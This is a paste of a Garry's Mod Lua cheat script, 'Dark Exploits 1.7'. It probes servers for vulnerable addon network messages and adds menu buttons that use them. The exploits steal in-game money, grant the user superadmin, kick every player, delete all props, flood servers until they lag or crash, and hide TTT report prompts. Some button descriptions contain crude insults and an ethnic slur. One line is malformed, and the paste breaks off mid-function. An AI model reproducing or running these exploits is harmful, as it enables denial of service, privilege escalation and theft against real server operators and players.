

Jan 22nd, 2019
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text 149.14 KB | None | 0 0
  1. if not LocalPlayer():InVehicle() then
  2. //////////////////////////////////////////////////////////////////////////
  4. /*
  6. */
  8. //////////////////////////////////////////////////////////////////////////
  13. //////////// [BASIC SHIT] ////////////
  15. if(istable(MOTDgd))then // Solly copypaste
  16. MOTDgd = {}
  17. function MOTDgd.Show() end
  18. function MOTDgd.GetIfSkip() return true end
  19. end
  21. concommand.Add("rainbow",function()
  22. hook.Add("Think", "Rainbow", function()
  23. local RainbowPlayer = HSVToColor( CurTime() % 6 * 60, 1, 1 )
  24. LocalPlayer():SetWeaponColor( Vector( RainbowPlayer.r / 255, RainbowPlayer.g / 255, RainbowPlayer.b / 255 ) )
  25. LocalPlayer():SetPlayerColor( Vector( RainbowPlayer.r / 255, RainbowPlayer.g / 255, RainbowPlayer.b / 255 ) )
  26. end )
  27. end )
  29. function random_string(length)
  30. math.randomseed(os.time())
  32. if length > 0 then
  33. return random_string(length - 1) .. charset[math.random(1, #charset)]
  34. else
  35. return ""
  36. end
  37. end
  39. local s = {}
  40. s.duel = {}
  41. s.duel[1] = table.Random( player.GetAll() )
  42. s.duel[2] = table.Random( player.GetAll() )
  43. s.duel[2] = 3
  44. s.duel[3] = -9999999
  46. //////////// [CHAT TEXT] ////////////
  48. function ECPrint( str )
  49. chat.AddText( Color( 150, 150, 150 ), "[Dark Exploits] ", Color( 255, 255, 255), str )
  50. end
  53. //////////// [NOTIFY] ////////////
  55. local function ECNotify(text)
  57. local notify = vgui.Create( "DPanel" )
  58. notify:SetSize( 200, 50 )
  59. notify:SetPos( ScrW() - 200, -50 )
  60. notify.Paint = function(self, w, h)
  61. draw.RoundedBox( 0, 0, 0, w, h, Color(50, 50, 50))
  62. local bars = 50
  63. for i=0, bars, 1 do
  64. local rainbow = HSVToColor( CurTime() % 6 * 60 + i, 1, 1 )
  65. draw.RoundedBox( 0, i * w / bars, notify:GetTall() - 2, w / bars, 3, Color(i + 1 * rainbow.r, i + 1 * rainbow.g, i + 1 * rainbow.b, 255))
  66. end
  67. //draw.RoundedBox( 0, 0, notify:GetTall() - 2, w, 2, HSVToColor( CurTime() % 6 * 60, 1, 1 ))
  68. draw.SimpleText( text, "Calibri-l", notify:GetWide() / 2, notify:GetTall() / 2, Color(255, 255, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  69. end
  70. notify:MoveTo( ScrW() - notify:GetWide(), 0, .2, 0, -1, function()
  71. timer.Simple( 3, function()
  72. notify:MoveTo( ScrW() - notify:GetWide(), -50, .2, 0, -1)
  73. end)
  74. end)
  75. end
  78. //////////// [CLEAR CHAT] ////////////
  80. function clearchat()
  81. for i = 0, 100 do
  82. chat.AddText(" ")
  83. end
  84. end
  86. //////////// [REMOVE ALL ERRORS] ////////////
  88. concommand.Add("removerrors", function()
  89. hook.Add("Think","wow", function()
  90. for k, v in pairs(ents.GetAll()) do
  91. if (v:GetModel():find("models/error.mdl")) then
  92. v:SetModel("models/player/group01/male_02.mdl")
  93. print(v:Nick() .. " model reset due to models/error.mdl")
  94. end
  95. end
  96. end)
  97. end )
  99. //////////// [VAPE] ////////////
  101. function Vape()
  102. timer.Simple(0, function() RunConsoleCommand("+attack") end )
  103. timer.Simple(5.134, function() RunConsoleCommand("-attack") end )
  104. end
  105. concommand.Add("vape", Vape)
  106. concommand.Add("clearchat", clearchat)
  108. //////////// [CAC CHECKER] ////////////
  110. if (_G.QAC or _G.CAC) then
  111. chat.AddText( Color( 0, 255, 255 ), "[", "DEX", "] ", Color( 255, 255, 255 ), "The server has Cake Anti Cheat!")
  112. end
  114. function Initialize()
  115. print("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n")
  116. surface.PlaySound("HL1/fvox/bell.wav")
  117. -- surface.PlaySound("buttons/button15.wav")
  118. ECNotify("Loaded Successfully!")
  119. net.Receive("DL_Answering_global", function(_len)end) // Stop LocalPlayer from getting kicked whilst kicking all
  120. net.Receive( "metro_notification",function() // Disable Metro Notification
  121. return
  122. end)
  124. //////////// Font Creation ////////////
  125. --
  126. surface.CreateFont( "Roboto", {
  127. font = "Roboto",
  128. size = 18,
  129. } )
  130. --
  131. surface.CreateFont( "Calibri-sm", {
  132. font = "Calibri",
  133. size = 15,
  134. } )
  135. --
  136. surface.CreateFont( "Calibri-l", {
  137. font = "Calibri",
  138. size = 21,
  139. } )
  140. --
  141. surface.CreateFont( "tahoma", {
  142. font = "Tahoma",
  143. size = 15,
  144. } )
  145. --
  146. end
  147. Initialize(); // Initializes basic shit for when menu is loaded.
  150. function ValidNetString( str )
  151. local status, error = pcall( net.Start, str )
  152. return status
  153. end
  155. function playSound(url)
  156. sound.PlayURL(url, '', function( station )
  157. if ( IsValid( station ) ) then
  158. station:SetPos( LocalPlayer():GetPos() )
  159. station:Play()
  160. end
  161. end)
  162. end
  163. playSound("")
  166. ------------------------------------------------------------------------
  168. //////////// [MENU] ////////////
  170. function draw.OutlinedBox( x, y, w, h, thickness, clr )
  171. surface.SetDrawColor( clr )
  172. for i=0, thickness - 1 do
  173. surface.DrawOutlinedRect( x + i, y + i, w - i * 2, h - i * 2 )
  174. end
  175. end
  177. local menu = vgui.Create( "DFrame" )
  178. menu:SetTitle("")
  179. menu:SetSize( 400, 300 )
  180. menu:SetPos( ScrW() / 2 - menu:GetWide() / 2, ScrH() / 2 - menu:GetTall() / 2 )
  181. menu:SetMouseInputEnabled(true)
  182. menu:SetKeyBoardInputEnabled(true)
  183. menu:SetVisible(false)
  184. menu:ShowCloseButton(false)
  185. menu:SetAlpha(0)
  186. menu.Paint = function( self, w, h )
  187. draw.RoundedBox( 0, 0, 0, w, h, Color( 20, 20, 20, 255 ) )
  188. draw.RoundedBox( 0, 0, 0, w, 32, Color( 25, 25, 25, 255 ) )
  189. local bars = 50
  190. for i=1, bars, 1 do
  191. local rainbow = HSVToColor( CurTime() % 6 * 60 + i, 1, 1 )
  192. //draw.RoundedBox( 0, i * w / bars, 31, w / bars * -1, 3, Color(i + 1 * rainbow.r, i + 1 * rainbow.g, i + 1 * rainbow.b, 255))
  193. end
  194. draw.RoundedBox( 0, 0, 35, w, 22, Color( 25, 25, 25 ) )
  195. draw.OutlinedBox( 0, 0, w, h, 3, Color( 15, 15, 15 ) )
  196. draw.OutlinedBox( 1, 1, w - 2, h - 2 , 1, Color( 45, 45, 45 ) )
  197. draw.SimpleTextOutlined( "Dark Exploits 1.7", "Roboto", menu:GetWide() / 2, 6, Color( 255, 255, 255, 255 ), TEXT_ALIGN_CENTER, TEXT_ALIGN_TOP, 0.5, Color(255, 255, 255, 255))
  198. draw.SimpleText( totalSploits .. "/293", "Roboto", 6, 6, Color(255, 255, 255), TEXT_ALIGN_LEFT )
  199. end
  201. //////////// [CLOSE BUTTON] ////////////
  203. local closebtn = vgui.Create( "DButton", menu )
  204. closebtn:SetText( "X" )
  205. closebtn:SetTextColor( Color( 150, 150, 150 ) )
  206. closebtn:SetPos( menu:GetWide() - 31, 0 )
  207. closebtn:SetFont("Roboto")
  208. closebtn:SetSize( 31, 31 )
  209. closebtn.Paint = function( self, w, h )
  210. if closebtn:IsHovered() then
  211. draw.RoundedBox( 0, 0, 0, w, h, Color(50, 50, 50))
  212. else
  213. draw.RoundedBox( 0, 0, 0, w, h, Color( 0, 0, 0, 0 ) )
  214. end
  215. end
  217. closebtn.DoClick = function()
  218. surface.PlaySound( "garrysmod/ui_click.wav" )
  219. menu:SetMouseInputEnabled(false)
  220. menu:SetKeyBoardInputEnabled(false)
  221. menu:AlphaTo(0, 0.5, 0, function()
  222. menu:SetVisible(false)
  223. hook.Remove("RenderScreenspaceEffects", "menuBlur")
  224. end)
  225. end
  227. //////////// [TABS] ////////////
  229. local tabs = vgui.Create( "DPropertySheet", menu )
  230. tabs:Dock( FILL )
  231. tabs:DockPadding( -5, 5, 0, 0)
  232. tabs.Paint = function (self, w, h)
  233. for k, v in pairs(tabs.Items) do
  234. if (!v.Tab) then continue end
  236. v.Tab.Paint = function(self,w,h)
  237. draw.RoundedBox( 0, 0, 0, w, 22, Color( 25, 25, 25, 255 ) )
  238. draw.RoundedBox( 0, 0, 22, w - 2, 1, Color( 45, 45, 45, 255 ) )
  239. if ( tabs:GetActiveTab() == v.Tab ) then
  240. draw.RoundedBox( 0, 0, 0, w, 22, Color( 25, 25, 25, 255 ) )
  241. //draw.RoundedBox( 0, 0, 22, w - 2, 1, Color( 255, 255, 255, 255 ) )
  242. draw.RoundedBox( 0, 0, 22, w, 1, Color(255,255,255,255))
  243. end
  244. end
  245. end
  246. end
  248. //////////// [PANELS] ////////////
  250. local exploitsPanel = vgui.Create( "DPanel", tabs )
  251. exploitsPanel.Paint = function( self, w, h )
  252. draw.RoundedBox(0, 0, 0, w, h, Color( 25, 25, 25 ))
  253. draw.OutlinedBox( 0, 0, w, h, 1, Color( 45, 45, 45 ) )
  254. end
  255. local sheet1 = tabs:AddSheet( "Exploits", exploitsPanel )
  256. local exploitsScrollPanel = vgui.Create( "DScrollPanel", exploitsPanel )
  257. exploitsScrollPanel:Dock( FILL )
  260. //////////// [NEW EXPLOIT] ////////////
  261. --------------------
  262. totalSploits = 0
  263. function addExploit(id, text, desc, func)
  264. totalSploits = 1 + totalSploits
  265. local id = vgui.Create( "DButton", exploitsScrollPanel )
  266. id:SetText( text )
  267. id:SetTextColor( Color( 200, 200, 200 ) )
  268. id:SetFont("Roboto")
  269. id:Dock( TOP )
  270. id:DockMargin( 10, 10, 10, -5 )
  271. id:DockPadding( 2, 25, 2, 50 )
  272. id.DoClick = func
  273. if desc then
  274. id:SetToolTip( desc )
  275. end
  276. id.Paint = function( self, w, h )
  277. id.OnCursorEntered = function(self)
  278. -- surface.PlaySound( "garrysmod/ui_hover.wav" )
  279. surface.PlaySound( "buttons/button15.wav" )
  280. end
  281. if id:IsHovered() then
  282. -- draw.SimpleText( desc, "Calibri-sm", -25, 2, HSVToColor( CurTime() % 6 * 60, 1, 1 ), TEXT_ALIGN_RIGHT) -- Only Citizen Hack Lua Loader
  283. draw.RoundedBox( 0, 0, 0, w, h, Color(30, 30, 30))
  284. else
  285. draw.RoundedBox( 0, 0, 0, w, h, Color(20, 20, 20))
  286. end
  287. surface.SetDrawColor( 0, 0, 0, 255)
  288. surface.DrawOutlinedRect( 0, 0, w, h )
  289. end
  290. end
  293. //////////////////// [EXPLOITS] ////////////////////
  295. status = ValidNetString("TCBBuyAmmo")
  296. if (status) then
  297. ECPrint("Found Exploit: Free Ammo [TCBBuyAmmo]")
  298. addExploit( "1","Free Ammo", "Gets All Ammo Types", function()
  299. surface.PlaySound("garrysmod/ui_click.wav")
  300. ECPrint("Getting Le Ammo")
  301. for k,v in pairs(GAMEMODE.AmmoTypes) do
  302. net.Start("TCBBuyAmmo")
  303. net.WriteTable( {nil,v.ammoType,nil,"0","999999"} )
  304. net.SendToServer()
  305. end
  306. end)
  307. end
  309. status = ValidNetString("DataSend")
  310. if (status) then
  311. ECPrint("Found Exploit: Steal All Monies #1 [DataSend]")
  312. addExploit( "2","Steal All Monies #1", "Takes money from printers", function()
  313. surface.PlaySound("garrysmod/ui_click.wav")
  314. for k, v in pairs( ents.GetAll() ) do
  315. if v:GetClass() == "adv_moneyprinter" then
  316. ECPrint("Collecting Money")
  317. net.Start("DataSend")
  318. net.WriteFloat(2)
  319. net.WriteEntity(v)
  320. net.WriteEntity(LocalPlayer())
  321. net.SendToServer()
  322. end
  323. end
  324. end)
  325. end
  328. status = ValidNetString("FarmingmodSellItems")
  329. if (status) then
  330. ECPrint("Found Exploit: Free Money [FarmingmodSellItems]")
  331. addExploit( "3","Free Money", "An exploit in the Farming Mod", function()
  332. surface.PlaySound("garrysmod/ui_click.wav")
  333. ECPrint("Enjoy the b1g monies")
  334. net.Start("FarmingmodSellItems")
  335. net.WriteTable(
  336. {
  337. Cost = 10,
  338. CropModel = "models/props/eryk/garlic.mdl",
  339. CropType = 2,
  340. Info = "Garlic Seed",
  341. Model = "models/props/eryk/seedbag.mdl",
  342. Name = "Garlic",
  343. Quality = 4,
  344. Sell = 99999,
  345. Type = "Seed"
  346. }
  347. )
  348. net.WriteInt(1,16)
  349. net.SendToServer()
  350. end)
  351. end
  353. status = ValidNetString("start_wd_emp")
  354. if (status) then
  355. ECPrint("Found Exploit: Hack Keypad [start_wd_emp]")
  356. addExploit( "4","Hack Keypad", "Instantly opens nearby keypads. Has a cooldown", function()
  357. surface.PlaySound("garrysmod/ui_click.wav")
  358. ECNotify("Hacking Keypads")
  359. net.Start("start_wd_emp")
  360. net.SendToServer()
  361. end)
  362. end
  364. status = ValidNetString("duelrequestguiYes")
  365. if (status) then
  366. ECPrint("Found Exploit: Get Money [duelrequestguiYes]")
  367. addExploit( "5","Get Money", "Duel Exploit", function()
  368. surface.PlaySound("garrysmod/ui_click.wav")
  369. ECNotify("getting ez monies")
  370. net.Start("duelrequestguiYes")
  371. net.WriteInt(-99999999999999999999999999999999999999999999999999999999999999999999999999999,32)
  372. net.WriteEntity(table.Random( player.GetAll() ) )
  373. net.WriteString("Crossbow")
  374. net.SendToServer()
  375. end)
  376. end
  378. status = ValidNetString("DarkRP_Kun_ForceSpawn")
  379. if (status) then
  380. ECPrint("Found Exploit: Respawn #1 [DarkRP_Kun_ForceSpawn]")
  381. addExploit( "6", "Respawn #1", "Just respawn", function()
  382. surface.PlaySound("garrysmod/ui_click.wav")
  383. ECPrint("Respawn")
  384. net.Start("DarkRP_Kun_ForceSpawn")
  385. net.SendToServer()
  386. end)
  387. end
  389. status = ValidNetString("SyncPrinterButtons76561198056171650")
  390. if (status) then
  391. ECPrint("Found Exploit: Steal All Monies #2 [SyncPrinterButtons76561198056171650]")
  392. addExploit( "7","Steal All Monies #2", "Takes money from printers", function()
  393. surface.PlaySound("garrysmod/ui_click.wav")
  394. ECPrint("Collecting Money")
  395. for k, v in pairs(ents.GetAll()) do
  396. if (v:GetClass() == "adv_moneyprinter") then
  397. net.Start("SyncPrinterButtons76561198056171650")
  398. net.WriteEntity(v)
  399. net.WriteUInt(2, 4)
  400. net.SendToServer()
  401. end
  402. end
  403. end)
  404. end
  405. ---------------------------------------------------------------------------------------------
  406. local function report()
  407. for i = 1, 2000 do
  408. net.Start("DL_Answering")
  409. net.SendToServer()
  410. end
  411. end
  413. if (Damagelog) then
  414. ECPrint("Found Exploit: Kick All Players")
  415. reportSpam = 0
  416. addExploit( "1337","Kick All Players", "Kicks all players", function()
  417. surface.PlaySound("garrysmod/ui_click.wav")
  418. if (reportSpam == 0) then
  419. ECNotify("Starting Kicker")
  420. reportSpam = 1
  421. timer.Create("reportSpammer", 0.05, 0, report)
  422. else
  423. ECNotify("Stopping Kicker")
  424. reportSpam = 0
  425. timer.Remove("reportSpammer")
  426. end
  428. end)
  429. end
  430. ----------------------------------------------------------------------------------------------
  432. status = ValidNetString("SimplicityAC_aysent")
  433. if (status) then
  434. ECPrint("Found Exploit: Crash #1 [SimplicityAC_aysent]")
  435. addExploit( "8","Crash #1", "Will instantly crash the server", function()
  436. surface.PlaySound("garrysmod/ui_click.wav")
  437. ECPrint("Goodbye Server")
  438. local tbl = {}
  439. for i=1,400 do
  440. tbl[i] = i
  441. end
  442. net.Start("SimplicityAC_aysent")
  443. net.WriteUInt(1, 8)
  444. net.WriteUInt(4294967295, 32)
  445. net.WriteTable(tbl)
  446. net.SendToServer()
  447. end)
  448. end
  450. status = ValidNetString("RevivePlayer")
  451. if (status) then
  452. ECPrint("Found Exploit: Reanimation #1 [RevivePlayer]")
  453. addExploit( "9", "Reanimation #1", "Instant revival", function()
  454. surface.PlaySound("garrysmod/ui_click.wav")
  455. if !timer.Exists( "reanimation1" ) then
  456. ECNotify( "Enabled" )
  457. timer.Create( "reanimation1", 0.5, 0, function()
  458. if !LocalPlayer():Alive() then
  459. net.Start("RevivePlayer")
  460. net.WriteEntity(LocalPlayer())
  461. net.SendToServer()
  462. end
  463. end)
  464. else
  465. timer.Remove( "reanimation1" )
  466. ECNotify( "Disabled" )
  467. end
  468. end )
  469. end
  471. status = ValidNetString("NLRKick")
  472. if (status) then
  473. ECPrint("Found Exploit: Kick Everyone [NLRKick]")
  474. addExploit( "10","Kick Everyone", "kick all the beaners", function()
  475. surface.PlaySound("garrysmod/ui_click.wav")
  476. ECNotify("Kicking All")
  477. for k,v in pairs(player.GetAll()) do
  478. if v != LocalPlayer() then
  479. net.Start("NLRKick")
  480. net.WriteEntity(v)
  481. net.SendToServer()
  482. end
  483. end
  484. end)
  485. end
  487. status = ValidNetString("timebombDefuse")
  488. if (status) then
  489. ECPrint("Found Exploit: Delete All Props [timebombDefuse]")
  490. addExploit( "11","Delete All Props", "props = dead", function()
  491. surface.PlaySound("garrysmod/ui_click.wav")
  492. ECNotify("Props De_Stroyed")
  493. for k,v in pairs(ents.GetAll()) do
  494. net.Start("timebombDefuse")
  495. net.WriteEntity(v)
  496. net.WriteBool(true)
  497. net.SendToServer()
  498. end
  499. end)
  500. end
  502. status = ValidNetString("NDES_SelectedEmblem")
  503. if (status) then
  504. ECPrint("Found Exploit: Lagger #2 [NDES_SelectedEmblem]")
  505. addExploit( "12","Lagger #2", "oof yuh get l4gged", function()
  506. surface.PlaySound("garrysmod/ui_click.wav")
  507. if !timer.Exists( "lagger2" ) then
  508. timer.Create("lagger2", 0.5, 0, function()
  509. for i=1, 2000 do
  510. net.Start("NDES_SelectedEmblem",true)
  511. net.WriteString("seized")
  512. net.SendToServer()
  513. end
  514. end)
  515. ECNotify("Starting Lagger")
  516. else
  517. timer.Remove("lagger2")
  518. ECNotify("Stopping Lagger")
  519. end
  520. end)
  521. end
  523. status = ValidNetString("Morpheus.StaffTracker")
  524. if (status) then
  525. ECPrint("Found Exploit: Crasher #1 [Morpheus.StaffTracker]")
  526. addExploit( "13","Crasher #1", "not even hard. unlike nippy's dick when he sees voltz", function()
  527. surface.PlaySound("garrysmod/ui_click.wav")
  528. if !timer.Exists( "crasher1" ) then
  529. timer.Create("crasher1", 0.5, 0, function()
  530. for i=1, 2000 do
  531. net.Start("Morpheus.StaffTracker")
  532. net.SendToServer()
  533. end
  534. end)
  535. ECNotify("Crashing Server")
  536. else
  537. timer.Remove("crasher1")
  538. ECNotify( "Canceling Crasher" )
  539. end
  540. end)
  541. end
  543. status = ValidNetString("egg")
  544. if (status) then
  545. ECPrint("Found Exploit: Get Easter Egg")
  546. addExploit( "14","Get Easter Egg", "ez eggs", function()
  547. surface.PlaySound("garrysmod/ui_click.wav")
  548. RunConsoleCommand("say", "4bigz")
  549. RunConsoleCommand("cc_egg2")
  550. net.Start("egg")
  551. net.SendToServer()
  552. ECNotify("Gave Easter Egg")
  553. end)
  554. end
  556. status = ValidNetString("pplay_deleterow")
  557. if (status) then
  558. ECPrint("Found Exploit: GET SUPERADMIN [pplay_deleterow]")
  559. addExploit( "15","GET SUPERADMIN", "Rejoin game after clicking", function()
  560. surface.PlaySound("garrysmod/ui_click.wav")
  561. local id = LocalPlayer():SteamID()
  562. local tbl = {}
  563. = "FAdmin_PlayerGroup"
  564. tbl.where = {
  565. "steamid",
  566. tostring(id)
  567. }
  569. net.Start("pplay_deleterow")
  570. net.WriteTable(tbl)
  571. net.SendToServer()
  572. local tbl = {}
  573. tbl.tblname = "FAdmin_PlayerGroup"
  574. tbl.tblinfo = {
  575. tostring(id),
  576. "superadmin"
  577. }
  578. net.Start("pplay_addrow")
  579. net.WriteTable(tbl)
  580. net.SendToServer()
  581. ECNotify("promotion ;)")
  582. end)
  583. end
  585. -- ttt report bypass by daddy grampa
  587. local function CheckChild(pan)
  588. local title = "You have been reported! Please answer all your reports."
  589. if !pan || !IsValid(pan) then return end
  590. if pan.GetTitle && pan:GetTitle() == title then
  591. pan:Remove();
  592. print("Removed warning box")
  593. return
  594. end
  595. for k,v in pairs(pan:GetChildren()) do
  596. if v.GetTitle && v:GetTitle() == title then
  597. v:Remove();
  598. print("Removed warning box")
  599. return
  600. end
  601. if #v:GetChildren() > 0 then
  602. CheckChild(v)
  603. end
  604. end
  605. end
  607. if (engine.ActiveGamemode() == "terrortown") then
  608. bypass = 0
  609. ECPrint("Found Exploit: TTT Report Bypass")
  610. addExploit( "16","Toggle TTT Report Bypass", "b1g bypass amirite", function()
  611. surface.PlaySound("garrysmod/ui_click.wav")
  612. if (bypass == 0) then
  613. hook.Add("Think", "remove_ttt_report", function()
  614. local pan = vgui.GetHoveredPanel()
  615. CheckChild(pan)
  616. end)
  617. ECNotify("Enabled Report Bypass")
  618. bypass = 1
  619. else
  620. hook.Remove("Think", "remove_ttt_report")
  621. ECNotify("Disabled Report Bypass")
  622. bypass = 0
  623. end
  624. end)
  625. end
  627. status = ValidNetString("EZS_PlayerTag")
  628. if (status) then
  629. ECPrint("Found Exploit: Lagger #3 [EZS_PlayerTag]")
  630. addExploit( "17","Lagger #3", "b1g lags my duder", function()
  631. surface.PlaySound("garrysmod/ui_click.wav")
  632. if !timer.Exists( "lagger3" ) then
  633. timer.Create("lagger3", 0.5, 0, function()
  634. for k, v in pairs(player.GetAll()) do
  635. net.Start("EZS_PlayerTag",true)
  636. net.WriteEntity(v)
  637. net.WriteString("Seized")
  638. net.SendToServer()
  639. timer.Simple(2, function()
  640. net.Start("EZS_PlayerTag",true)
  641. net.WriteEntity(v)
  642. net.WriteString("Seized")
  643. net.SendToServer()
  644. end)
  645. end
  646. end)
  647. ECNotify("Starting Lagger")
  648. else
  649. timer.Remove("lagger3")
  650. ECNotify("Stopping Lagger")
  651. end
  652. end)
  653. end
  655. if ConVarExists("advttt_spreadovertime_enabled") then
  656. ECPrint("Found Exploit: Remove Spread")
  657. addExploit( "18","Remove Spread", "pSilent No Spread", function()
  658. surface.PlaySound("garrysmod/ui_click.wav")
  659. hook.Remove("PlayerTick", "WyoziAdvTTTSpreadOverTime")
  660. ECNotify("Spread Removed")
  661. end)
  662. end
  664. status = ValidNetString("fp_as_doorHandler")
  665. if (status) then
  666. ECPrint("Found Exploits: Open Door, Close Door, Remove Door Owners [fp_as_doorHandler]")
  667. addExploit( "19","Open Door", "Force open the door you are looking at", function()
  668. surface.PlaySound("garrysmod/ui_click.wav")
  669. net.Start("fp_as_doorHandler")
  670. net.WriteEntity(LocalPlayer():GetEyeTrace().Entity)
  671. net.WriteString("unlock")
  672. net.SendToServer()
  673. ECNotify("Opened Door")
  674. end)
  675. end
  677. status = ValidNetString("fp_as_doorHandler")
  678. if (status) then
  679. addExploit( "20","Close Door", "Force close the door you are looking at", function()
  680. surface.PlaySound("garrysmod/ui_click.wav")
  681. net.Start("fp_as_doorHandler")
  682. net.WriteEntity(LocalPlayer():GetEyeTrace().Entity)
  683. net.WriteString("lock")
  684. net.SendToServer()
  685. ECNotify("Opened Door")
  686. end)
  687. end
  689. status = ValidNetString("fp_as_doorHandler")
  690. if (status) then
  691. addExploit( "21","Remove Door Owner", "Force remove door owner of the door you are looking at", function()
  692. surface.PlaySound("garrysmod/ui_click.wav")
  693. local door = LocalPlayer():GetEyeTrace().Entity
  694. local doorOwner = door:getDoorData()["owner"]
  695. net.Start("fp_as_doorHandler")
  696. net.WriteEntity(door)
  697. net.WriteString("removeOwner")
  698. net.WriteDouble(doorOwner)
  699. net.SendToServer()
  700. ECNotify("Opened Door")
  701. end)
  702. end
  704. status = ValidNetString("VJSay")
  705. if (status) then
  706. ECPrint("Found Exploit: VJSay [OLD] [VJSay]")
  707. addExploit( "22","VJSay [OLD]", "", function()
  708. surface.PlaySound("garrysmod/ui_click.wav")
  709. inputFrame2Exists = true
  710. inputFrame2 = vgui.Create( "DFrame" )
  711. inputFrame2:SetTitle("Enter your message!")
  712. inputFrame2:SetSize( 400, 75 )
  713. inputFrame2:SetPos(ScrW() / 2 - inputFrame2:GetWide() / 2, ScrH() / 2 + 230 )
  714. inputFrame2:SetDraggable(false)
  715. inputFrame2:ShowCloseButton(false)
  716. inputFrame2:MakePopup()
  717. inputFrame2.Paint = function( self, w, h )
  718. draw.RoundedBox( 5, 0, 0, w, h, Color(30, 30, 30))
  719. end
  721. local TextEntry2 = vgui.Create( "DTextEntry", inputFrame2 )
  722. TextEntry2:SetSize( 380, 30 )
  723. TextEntry2:SetPos( inputFrame2:GetWide() / 2 - TextEntry2:GetWide() / 2, inputFrame2:GetTall() / 2 - TextEntry2:GetTall() / 2 )
  724. TextEntry2:SetText( "Broadcast Msg" )
  725. TextEntry2.OnEnter = function( self )
  726. surface.PlaySound("garrysmod/ui_click.wav")
  727. ECNotify("Broadcasting")
  728. net.Start("VJSay")
  729. net.WriteEntity(nil)
  730. net.WriteString(TextEntry2:GetValue())
  731. net.WriteString("")
  732. net.SendToServer()
  733. inputFrame2:SetVisible(false)
  734. end
  735. end)
  736. end
  738. status = ValidNetString("ply_pick_shit")
  739. if (status) then
  740. ECPrint("Found Exploit: free money amirite [ply_pick_shit]")
  741. addExploit( "23","free money amirite", "stacks in ur wallet generator", function()
  742. surface.PlaySound("garrysmod/ui_click.wav")
  743. for k, v in pairs (player.GetAll()) do
  744. for i = 1,255 do
  745. net.Start("ply_pick_shit")
  746. net.WriteEntity(LocalPlayer())
  747. net.WriteEntity(v)
  748. net.SendToServer()
  749. end
  750. end
  751. ECNotify("enjoy monies")
  752. end)
  753. end
  755. status = ValidNetString("")
  756. if (status) then
  757. ECPrint("Found Exploit: Crasher #2 []")
  758. addExploit( "24","Crasher #2", "big lagz", function()
  759. surface.PlaySound("garrysmod/ui_click.wav")
  760. if !timer.Exists( "crasher2" ) then
  761. timer.Create("crasher2", 0, 0, function()
  762. for i = 1, 400 do
  763. net.Start("")
  764. net.WriteInt( 9999999999999999999999999999999999999999999999999999999999999999999999, 13)
  765. net.SendToServer()
  766. end
  767. end)
  768. ECNotify("Starting Crasher")
  769. else
  770. timer.Remove("crasher2")
  771. ECNotify("Stopping Crasher")
  772. end
  773. end)
  774. end
  776. status = ValidNetString("BM2.Command.SellBitcoins")
  777. if (status) then
  778. ECPrint("Found Exploit: Sell Your Bitcoins [BM2.Command.SellBitcoins]")
  779. addExploit( "25","Sell your Bitcoins", "sells your and other peoples bitcoins at a great distance", function()
  780. surface.PlaySound("garrysmod/ui_click.wav")
  781. for k, v in pairs(ents.FindByClass("bm2_bitminer_1")) do
  782. net.Start("BM2.Command.SellBitcoins")
  783. net.WriteEntity(v)
  784. net.SendToServer()
  785. end
  786. for k, v in pairs(ents.FindByClass("bm2_bitminer_2")) do
  787. net.Start("BM2.Command.SellBitcoins")
  788. net.WriteEntity(v)
  789. net.SendToServer()
  790. end
  791. for k, v in pairs(ents.FindByClass("bm2_bitminer_rack")) do
  792. net.Start("BM2.Command.SellBitcoins")
  793. net.WriteEntity(v)
  794. net.SendToServer()
  795. end
  796. end)
  797. end
  799. status = ValidNetString("BM2.Command.Eject")
  800. if (status) then
  801. ECPrint("Found Exploit: Lagger #4 [BM2.Command.Eject]")
  802. addExploit( "26","Lagger #4", "discovered by triggered", function()
  803. surface.PlaySound("garrysmod/ui_click.wav")
  804. if !timer.Exists( "lagger4" ) then
  805. timer.Create("lagger4", 0, 0, function()
  806. for i = 1, 1000 do
  807. net.Start("BM2.Command.Eject",true)
  808. net.WriteInt(9999999999999999999999999999999999999999999999999999999999999999999999, 8)
  809. net.SendToServer()
  810. end
  811. end)
  812. ECNotify("Starting Lagger")
  813. else
  814. timer.Remove("lagger4")
  815. ECNotify("Stopping Lagger")
  816. end
  817. end)
  818. end
  820. status = ValidNetString("BM2.Command.SellBitcoins")
  821. if (status) then
  822. ECPrint("Found Exploit: Lagger #5 [BM2.Command.SellBitcoins]")
  823. addExploit( "27","Lagger #5", "discovered by Leith, an exploit in the addon 'Bitminers 2'", function()
  824. surface.PlaySound("garrysmod/ui_click.wav")
  825. timer.Create("lagger5", 0, 0, function()
  826. for i=1,1000 do
  827. net.Start("BM2.Command.SellBitcoins",true)
  828. net.WriteEntity(LocalPlayer())
  829. net.SendToServer()
  830. end
  831. end )
  832. end )
  833. end
  835. status = ValidNetString("ItemStoreUse")
  836. if (status) then
  837. ECPrint("Found Exploit: Lagger #6 [ItemStoreUse]")
  838. addExploit( "28","Lagger #6", "discovered by triggered, an exploit in the addon 'ItemStore'", function()
  839. surface.PlaySound("garrysmod/ui_click.wav")
  840. if !timer.Exists( "lagger6" ) then
  841. timer.Create("lagger6", 0, 0, function()
  842. for i = 1, 1000 do
  843. net.Start("ItemStoreUse",true)
  844. net.WriteUInt(9999999999999999999999999999999999999999999999999999999999, 32)
  845. net.WriteUInt(9999999999999999999999999999999999999999999999999999999999, 32)
  846. net.SendToServer()
  847. end
  848. end)
  849. ECNotify("Starting Lagger")
  850. else
  851. timer.Remove("lagger6")
  852. ECNotify("Stopping Lagger")
  853. end
  854. end)
  855. end
  857. status = ValidNetString("ItemStoreDrop")
  858. if (status) then
  859. ECPrint("Found Exploit: Lagger #7 [ItemStoreDrop]")
  860. addExploit( "29","Lagger #7", "discovered by Leith, an exploit in the addon 'ItemStore'", function()
  861. surface.PlaySound("garrysmod/ui_click.wav")
  862. if !timer.Exists( "lagger7" ) then
  863. timer.Create("lagger7", 0, 0, function()
  864. for i = 1, 1000 do
  865. net.Start("ItemStoreDrop",true)
  866. net.WriteUInt(9999999999999999999999999999999999999999999999999999999999, 32)
  867. net.WriteUInt(9999999999999999999999999999999999999999999999999999999999, 32)
  868. net.SendToServer()
  869. end
